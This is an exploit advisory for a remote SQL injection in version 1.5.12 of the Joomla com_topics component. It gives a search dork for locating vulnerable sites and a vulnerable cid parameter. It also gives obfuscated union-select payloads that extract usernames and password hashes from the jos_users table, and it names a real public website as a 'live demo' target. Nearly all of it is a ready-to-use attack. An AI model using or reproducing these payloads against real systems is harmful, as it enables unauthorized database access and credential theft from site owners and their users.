Joomla Topics component version 1.5.12 suffers from a remote SQL injection vulnerability.
aec0ce3cd417af7d8f302767093442d329b5f38d38c058a23b3171d614ab4218
######################
# Exploit Title : Joomla com_topics SQL injection
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_topics
# Category: [ Webapps ]
# version: 1.5.12
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/08
# video Proof Youtube : https://youtu.be/2KynoDHvEkY
######################
# SQL injection
######################
# PoC:
# [cid=] Get Parameter Vulnerable To SQL
#
https://server/index.php?option=com_topics&view=readall&cid=[SQLi]&Itemid=40931&lang=en
# Demo
#
https://server/index.php?option=com_topics&view=readall&cid=5927'&Itemid=40931&lang=en
# https://server/index.php?option=com_topics&view=readall&cid=-5927
/*!union*/ select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--&Itemid=40931&lang=en
# https://server/index.php?option=com_topics&view=readall&cid=-5927
/*!union*/ select
1,2,/*!group_coNcat(username,0x3a,password)*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
/*!from*/ jos_users--&Itemid=40931&lang=en
# Live Demo :
# https://www.paho.org/hq/
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################